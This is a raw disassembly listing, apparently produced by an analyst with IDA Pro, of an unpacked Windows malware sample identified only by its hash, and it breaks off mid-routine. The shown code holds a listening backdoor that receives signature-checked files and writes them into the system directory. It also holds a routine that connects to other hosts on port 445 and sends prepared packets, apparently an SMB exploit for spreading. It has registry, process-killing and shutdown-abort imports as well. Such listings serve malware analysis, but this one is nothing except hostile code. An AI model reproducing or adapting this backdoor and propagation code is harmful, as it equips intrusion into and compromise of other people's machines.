;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 064E4D77420C13177DC84C68598880ED
; File Name : u:\work\064e4d77420c13177dc84c68598880ed_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31003425+1D�r
dword_31001010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31003425+4E�r ...
dword_31001018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_31001248+FD�r
dword_3100102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31001044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31001048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3100104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31001050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31001054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31001058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3100105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31001060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31001064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31001068 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31003630+F�r
dword_3100106C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31003630+C3�r
dword_31001070 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_31001074 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_31001078 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_310031AE+3F�r ...
dword_3100107C dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_31001080 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_31001084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_31001088 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_3100277D:loc_310029C3�r ...
dword_31001090 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31002663+3D�r ...
dword_31001094 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31002463+168�r ...
dword_31001098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_31001248:loc_31001329�r ...
dword_3100109C dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_310010A0 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31002405+A�r
dword_310010A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31001582+66�r ...
dword_310010A8 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31002663+ED�r
dword_310010AC dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_31002663+8F�r ...
dword_310010B0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_31001651+4F�r ...
dword_310010B4 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_31001361+14B�r
dword_310010B8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31001361+13E�r ...
dword_310010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31002280+66�r ...
dword_310010C0 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31002C26+13�r
dword_310010C4 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31002E68+8�r
dword_310010C8 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31002AD5+12�r ...
dword_310010CC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31002E7C+2D�r
dword_310010D0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31001651+272�r ...
dword_310010D4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31001E80+A4�r ...
dword_310010D8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_310010DC dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31001C40+2C�r
dword_310010E0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31002E7C+8C�r
dword_310010E4 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_310010E8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_310034D1+92�r
dword_310010EC dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31002E00�r
dword_310010F0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_3100277D+1E�r ...
align 8
dword_310010F8 dd 77C46030h ; resolved to->MSVCRT.strcpydword_310010FC dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_31001100: ; DATA XREF: sub_31003856�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31001104 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_31001108 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31002A98+22�r
; ---------------------------------------------------------------------------
loc_3100110C: ; DATA XREF: sub_31003850�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31003840�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31001114 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_310020C2+16�r ...
dword_31001118 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3100277D+B9�r
dword_3100111C dd 77C478A0h ; resolved to->MSVCRT.strlendword_31001120 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_31001124 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31001128 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31002217+C�r ...
align 10h
dword_31001130 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31001E80+8D�r ...
dword_31001134 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31001138 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_3100113C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId dd 0
dword_31001144 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31001148 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_310032FD+2B�r
dword_3100114C dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31001150 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile align 8
dword_31001158 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3100115C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31001160 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31001164 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31001168 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_3100116C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_31002BD1+25�r
dword_31001170 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31001174 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_31001178 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31001E80+46�r
dword_3100117C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31002C40+33�r
dword_31001180 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31001651+2B�r ...
dword_31001184 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31001651+147�r ...
dword_31001188 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31002C8E+100�r ...
dword_3100118C dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31002C8E+10D�r ...
dword_31001190 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31002C8E+120�r ...
dword_31001194 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31001651+559�r ...
dword_31001198 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31001361+D9�r ...
dword_3100119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31001361+95�r ...
dd 2 dup(0)
dword_310011A8 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_310011C0 proc near ; CODE XREF: sub_310014E6+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31001094 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_310011C0 endp
; =============== S U B R O U T I N E =======================================
sub_310011D9 proc near ; CODE XREF: sub_310014E6+3A�p
push ebx
push ebp
mov ebx, dword_31001034
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+10h]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31001208
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31001208
push 1
pop eax
jmp short loc_31001228
; ---------------------------------------------------------------------------
loc_31001208: ; CODE XREF: sub_310011D9+1B�j
; sub_310011D9+28�j
add edi, 14h
push edi
push ebp
push ebp
push 114h
push offset dword_31005000
push dword ptr [esi]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31001228: ; CODE XREF: sub_310011D9+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_310011D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3100122D proc near ; CODE XREF: sub_310014E6+7E�p
push esi
mov esi, ecx
push dword ptr [esi+14h]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [esi+10h]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3100122D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001248 proc near ; CODE XREF: sub_310014E6+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_310010A0 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_3100109C ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_310037D2
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_31001198 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_310037F8 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_31001329
jl short loc_310012B6
cmp ecx, 61C46800h
ja short loc_31001329
loc_310012B6: ; CODE XREF: sub_31001248+64�j
cmp eax, 0FFFFFFF7h
jl short loc_31001329
jg short loc_310012C5
cmp ecx, 9E3B9800h
jb short loc_31001329
loc_310012C5: ; CODE XREF: sub_31001248+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+10h]
call dword_3100101C ; CryptCreateHash
test eax, eax
jz short loc_3100131A
push 0
push 8
push esi
push [ebp+var_4]
call dword_31001020 ; CryptHashData
test eax, eax
jz short loc_3100131A
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3100131A
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+14h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31001024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31001342
loc_3100131A: ; CODE XREF: sub_31001248+98�j
; sub_31001248+AA�j ...
call dword_31001098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_31001028 ; CryptDestroyHash
loc_31001329: ; CODE XREF: sub_31001248+62�j
; sub_31001248+6C�j ...
call dword_31001098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31001332: ; CODE XREF: sub_31001248+117�j
push edi
call sub_310037E6
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31001342: ; CODE XREF: sub_31001248+D0�j
push [ebp+var_4]
call dword_31001028 ; CryptDestroyHash
call dword_31001128 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3100119C ; send
jmp short loc_31001332
sub_31001248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001361 proc near ; CODE XREF: sub_310014E6+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_31001380
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_310014D8
; ---------------------------------------------------------------------------
loc_31001380: ; CODE XREF: sub_31001361+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31001491
lea eax, [ebp+var_220]
push ebx
push eax
call dword_310010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_310010B4 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_310010B0 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_310010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_3100147F
mov ebx, dword_3100119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31001427
inc [ebp+arg_4]
loc_31001427: ; CODE XREF: sub_31001361+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31001474
loc_31001431: ; CODE XREF: sub_31001361+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31001474
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_310010A8 ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31001431
loc_31001474: ; CODE XREF: sub_31001361+CE�j
; sub_31001361+E5�j
push [ebp+var_C]
call dword_310010A4 ; CloseHandle
jmp short loc_310014E1
; ---------------------------------------------------------------------------
loc_3100147F: ; CODE XREF: sub_31001361+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3100119C ; send
loc_31001491: ; CODE XREF: sub_31001361+31�j
cmp [ebp+arg_4], 1
jnz short loc_310014C0
lea eax, [ebp+var_118]
push ebx
push eax
call dword_310010B8 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_310010B4 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3100119C ; send
loc_310014C0: ; CODE XREF: sub_31001361+134�j
cmp [ebp+arg_4], 3
jnz short loc_310014E1
push dword ptr [edi]
add edi, 4
push edi
call sub_31002B40
pop ecx
pop ecx
push 0
push 4
push esi
loc_310014D8: ; CODE XREF: sub_31001361+1A�j
push [ebp+arg_0]
call dword_3100119C ; send
loc_310014E1: ; CODE XREF: sub_31001361+11C�j
; sub_31001361+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310014E6 proc near ; DATA XREF: sub_31001582+AA�o
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_31002A98
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_18]
rep movsd
push [ebp+var_4]
call dword_310010C0 ; SetEvent
mov esi, 10000h
push esi
call sub_310037D2
pop ecx
mov edi, eax
lea ecx, [ebp+var_30]
call sub_310011C0
lea ecx, [ebp+var_30]
call sub_310011D9
lea eax, [ebp+var_18]
lea ecx, [ebp+var_30]
push eax
call sub_31001248
test eax, eax
jnz short loc_3100155A
loc_31001535: ; CODE XREF: sub_310014E6+72�j
push 0
push esi
push edi
push [ebp+var_18]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_3100155A
test eax, eax
jz short loc_3100155A
push eax
push edi
push [ebp+var_18]
call sub_31001361
add esp, 0Ch
jmp short loc_31001535
; ---------------------------------------------------------------------------
loc_3100155A: ; CODE XREF: sub_310014E6+4D�j
; sub_310014E6+5F�j ...
push edi
call sub_310037E6
pop ecx
lea ecx, [ebp+var_30]
call sub_3100122D
push [ebp+var_18]
call dword_31001194 ; closesocket
push 0
call dword_310010BC ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_310014E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31001582 proc near ; DATA XREF: sub_31002E7C+F6�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_31001180 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_310037FE ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_310015B3: ; CODE XREF: sub_31001582+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31001184 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31001188 ; bind
test eax, eax
jz short loc_310015DD
inc esi
cmp esi, 0Ah
jl short loc_310015B3
loc_310015DD: ; CODE XREF: sub_31001582+53�j
push 32h
push [ebp+var_4]
call dword_3100118C ; listen
mov ebx, dword_310010A4
loc_310015EE: ; CODE XREF: sub_31001582+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31001190 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_310010CC ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_310014E6
push esi
push esi
call dword_310010C8 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_310010C4 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_310015EE
sub_31001582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001651 proc near ; CODE XREF: sub_3100314A+36�p
; sub_310031AE+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31003810
mov eax, dword_31005B0C
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31005B10
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31001180 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31001BB1
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31001174 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_310010B0 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31005B00
push eax
call dword_31001130 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_310016C4: ; CODE XREF: sub_31001651+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310016C4
push 60h
lea eax, [ebp+var_E4]
push offset dword_31005614
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31003804 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_310037F8 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31003804 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31003804 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31003804 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_310037F8 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_310037FE ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_310037FE ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31001184 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31001178 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31001BA7
mov esi, dword_310010D4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3100119C
push 89h
push offset dword_310053FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
push 0
push 0A8h
push offset dword_31005488
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
push 0
push 0DEh
push offset dword_31005534
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
cmp eax, 46h
jl loc_31001B9C
cmp [ebp+var_730], 31h
jnz loc_31001A47
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_310037FE ; memset
add esp, 0Ch
push offset loc_31005120
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset loc_31005120
push eax
call sub_310037F8 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_310010D0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_310037F8 ; memcpy
mov eax, dword_31005A40
add esp, 0Ch
mov [ebp+var_798], eax
loc_310018E8: ; CODE XREF: sub_31001651+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
push 0
push 68h
push offset dword_31005678
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
push 0
push 0A0h
push offset dword_310056E4
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
cmp [ebp+arg_0], 0
jz loc_31001B37
push 68h
lea eax, [ebp+var_89E4]
push offset dword_3100589C
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_310037F8 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31005908
push eax
call sub_310037F8 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_310037F8 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_3100597C
push eax
call sub_310037F8 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31001198 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31001B9C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31001B8F
; ---------------------------------------------------------------------------
loc_31001A47: ; CODE XREF: sub_31001651+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_310037FE ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31005A7C
push eax
call sub_310037F8 ; memcpy
push offset loc_31005120
call sub_31003804 ; strlen
push eax
lea eax, [ebp+var_24E4]
